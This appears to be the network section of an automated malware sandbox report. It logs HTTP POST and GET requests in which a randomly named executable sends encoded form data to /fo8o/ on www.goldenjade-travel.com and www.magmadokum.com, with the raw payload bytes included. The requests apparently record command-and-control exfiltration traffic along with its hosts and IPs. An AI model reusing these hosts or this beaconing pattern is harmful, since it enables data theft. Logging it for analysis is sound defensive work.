                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449737116.50.37.244805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:49:53.495199919 CET797OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                                            Data Ascii: Ml18S=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
                                                                            Nov 22, 2024 07:49:55.060182095 CET492INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Fri, 22 Nov 2024 06:49:53 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449739116.50.37.244805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:49:56.145203114 CET817OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d
                                                                            Data Ascii: Ml18S=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=
                                                                            Nov 22, 2024 07:49:57.761873960 CET492INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Fri, 22 Nov 2024 06:49:57 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449741116.50.37.244805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:49:58.802984953 CET10899OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 72 62 4a [TRUNCATED]
                                                                            Data Ascii: Ml18S=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykvxW0 [TRUNCATED]
                                                                            Nov 22, 2024 07:50:00.373270988 CET492INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Fri, 22 Nov 2024 06:49:59 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449752116.50.37.244805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:50:01.692224026 CET521OUTGET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.goldenjade-travel.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:50:03.298827887 CET492INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Fri, 22 Nov 2024 06:50:02 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.44978885.159.66.93805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:50:17.642718077 CET776OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d
                                                                            Data Ascii: Ml18S=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.44979485.159.66.93805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:50:20.360714912 CET796OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 77 48 31 62 30 4b 55 32 70 33 31 34 55 71 54 73 4a 79 47 36 4e 68 6e 69 4b 2b 6f 68 44 4d 49 4d 3d
                                                                            Data Ascii: Ml18S=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.44980085.159.66.93805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:50:23.007030010 CET10878OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.magmadokum.com
                                                                            Origin: http://www.magmadokum.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.magmadokum.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 56 67 64 [TRUNCATED]
